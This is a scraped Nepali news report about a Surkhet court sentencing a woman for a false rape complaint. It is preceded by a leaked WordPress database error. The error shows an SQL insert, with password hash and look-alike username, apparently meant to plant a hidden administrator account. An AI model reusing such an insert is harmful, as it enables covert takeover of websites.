WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXIoBnfmKRMi5sQ5tl2ljOgoh7OBzZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:16:45', '', 'admlnlx', 'admlnlx')
वीरेन्द्रनगर । बलात्कारको झुटो आरोप लगाउने वीरेन्द्रनगरकी ३७ वर्षीया महिलालाई जिल्ला अदालत सुर्खेतले कैद सजायको फैसला गरेको छ । सोमबार जिल्ला न्यायाधीश डा राजेन्द्रकुमार आचार्यको एकल इजालसले ती महिलालाई तीन वर्ष छ महिनाको कैद सजाय गर्ने फैसला गरेको हो ।
वीरेन्द्रनगर नगरपालिकाको लेखा शाखामा कार्यरत खेमराज शर्माले आफूलाई होटलमा बोलाएर बलात्कार गरेको भन्दै ती महिलाले गत असोजमा जिल्ला प्रहरी कार्यालयमा जाहेरी दिएकी थिइन् । आफूमाथि बलात्कार भएको भन्दै जाहेरी दिएकी महिलाले नै अदालतमा बयान फेरेपछि अदालतले शर्मालाई सफाइ दिएको हो ।
झुटो जाहेरी दिएर व्यक्तिको मानहानी गरेको ठहर भएपछि जाहेरी दिने महिलालाई तीन वर्ष कैद सजाय तोकिएको जिल्ला अदालत सुर्खेतका स्रेस्तेदार यामप्रसाद बाँस्कोटाले बताए । अदालतको फैसलापछि महिलालाई पक्राउ गरेर कारागार चलान गर्न प्रहरीलाई पत्राचारसमेत गरिएको स्रेस्तेदार बाँस्कोटाले जानकारी दिए । रासस